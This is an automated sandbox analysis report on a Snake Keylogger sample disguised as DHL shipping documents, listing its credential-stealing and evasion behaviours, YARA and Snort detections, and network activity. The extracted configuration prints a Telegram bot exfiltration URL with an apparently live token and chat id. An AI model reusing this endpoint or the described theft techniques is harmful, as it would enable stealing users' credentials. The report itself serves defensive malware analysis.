Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL AWB SHIPPING DOCS_AWB_0009123.exe

Overview

General Information

Sample Name:DHL AWB SHIPPING DOCS_AWB_0009123.exe
Analysis ID:800700
MD5:cf98f42b9d4bbdc20e54e7e0ca7543c0
SHA1:2543080386230d110b18e1b653c14d1d640998da
SHA256:f7b57c7265e87bee11e652eba90afe3e0c34f691cd8faf3b79fe8def96044831
Tags:DHLexeSnakeKeylogger
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
May check the online IP address of the machine
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Yara detected Generic Downloader
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • DHL AWB SHIPPING DOCS_AWB_0009123.exe (PID: 1772 cmdline: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe MD5: CF98F42B9D4BBDC20E54E7E0CA7543C0)
    • tdbwdaltxz.exe (PID: 5884 cmdline: "C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe" C:\Users\user\AppData\Local\Temp\rjnyysvx.m MD5: 377552A9A2C84B8C55314176A566C079)
      • tdbwdaltxz.exe (PID: 5864 cmdline: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exe MD5: 377552A9A2C84B8C55314176A566C079)
      • MpCmdRun.exe (PID: 2576 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
        • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6155153237:AAHwniNOLh5IeMqe3WWu52NIjrXAphPX4U4/sendMessage?chat_id=5463149861"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmpMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth (Nextron Systems)
  • 0x2ecb8:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x2deea:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x2e31d:$a4: \Orbitum\User Data\Default\Login Data
  • 0x2f444:$a5: \Kometa\User Data\Default\Login Data
00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
        • 0x28192:$s1: UnHook
        • 0x28199:$s2: SetHook
        • 0x281a1:$s3: CallNextHook
        • 0x281ae:$s4: _hook
        Click to see the 42 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.tdbwdaltxz.exe.3c15530.6.raw.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth (Nextron Systems)
        • 0x1b660:$a2: \Comodo\Dragon\User Data\Default\Login Data
        • 0x1a892:$a3: \Google\Chrome\User Data\Default\Login Data
        • 0x1acc5:$a4: \Orbitum\User Data\Default\Login Data
        • 0x1bdec:$a5: \Kometa\User Data\Default\Login Data
        2.2.tdbwdaltxz.exe.3c15530.6.raw.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          2.2.tdbwdaltxz.exe.3c15530.6.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            2.2.tdbwdaltxz.exe.3c15530.6.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              2.2.tdbwdaltxz.exe.3c15530.6.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 106 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:192.168.2.3193.122.6.16849700802039190 02/07/23-18:24:17.350492
                SID:2039190
                Source Port:49700
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exeReversingLabs: Detection: 43%
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exeVirustotal: Detection: 37%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeReversingLabs: Detection: 23%
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeVirustotal: Detection: 12%Perma Link
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpackAvira: Label: TR/ATRAPS.Gen
                Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot6155153237:AAHwniNOLh5IeMqe3WWu52NIjrXAphPX4U4/sendMessage?chat_id=5463149861"}
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: wntdll.pdbUGP source: tdbwdaltxz.exe, 00000001.00000003.256979811.000000001A5B0000.00000004.00001000.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000001.00000003.256743149.000000001A740000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: tdbwdaltxz.exe, 00000001.00000003.256979811.000000001A5B0000.00000004.00001000.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000001.00000003.256743149.000000001A740000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 2_2_00406715 FindFirstFileExW,2_2_00406715
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 0105F851h2_2_0105F321
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 01058597h2_2_010582D8
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 010589F7h2_2_01058738
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 01057CD7h2_2_0105792F
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 0105FCA9h2_2_0105F9F0
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 01058E57h2_2_01058B99
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 01056D19h2_2_01056A59
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 010568A2h2_2_01055DB7
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 01058137h2_2_01057E78
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 010572E0h2_2_01056EC8
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 010572E0h2_2_0105720E
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_010552D8
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_0105590B
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_01055AEC
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeCode function: 4x nop then jmp 010572E0h2_2_01056EB9

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2039190 ET TROJAN 404/Snake/Matiex Keylogger Style External IP Check 192.168.2.3:49700 -> 193.122.6.168:80
                May check the online IP address of the machine
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeDNS query: name: checkip.dyndns.org
                Source: C:\Users\user\AppData\Local\Temp\tdbwdaltxz.exeDNS query: name: checkip.dyndns.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Joe Sandbox ViewASN Name: ORACLE-BMC-31898US ORACLE-BMC-31898US
                Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002CB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: tdbwdaltxz.exe, tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: tdbwdaltxz.exe, 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002CA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org4
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: tdbwdaltxz.exeString found in binary or memory: http://schemas.m
                Source: tdbwdaltxz.exe, 00000002.00000002.519971304.0000000002C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: tdbwdaltxz.exe, tdbwdaltxz.exe, 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, tdbwdaltxz.exe, 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: unknownDNS traffic detected: queries for: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.1290000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.1290000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.417058.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.417058.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.2b40000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 1.2.tdbwdaltxz.exe.ed0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 2.2.tdbwdaltxz.exe.f0cf58.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 1.2.tdbwdaltxz.exe.ee3658.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000001.00000002.262101627.0000000000ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000002.00000002.520282991.0000000003C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000002.00000002.519555630.0000000001290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth (Nextron Systems)
                Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000002.00000002.518311344.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000002.00000002.519618240.0000000002B42000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000002.00000002.519032371.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: tdbwdaltxz.exe PID: 5884, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: tdbwdaltxz.exe PID: 5884, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: tdbwdaltxz.exe PID: 5864, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: tdbwdaltxz.exe PID: 5864, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: DHL AWB SHIPPING DOCS_AWB_0009123.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: 2.2.tdbwdaltxz.exe.3c15530.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth (Nextron Systems), description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
